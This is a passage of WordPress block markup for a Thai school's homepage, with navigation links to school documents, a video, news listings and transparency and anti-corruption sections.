{\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 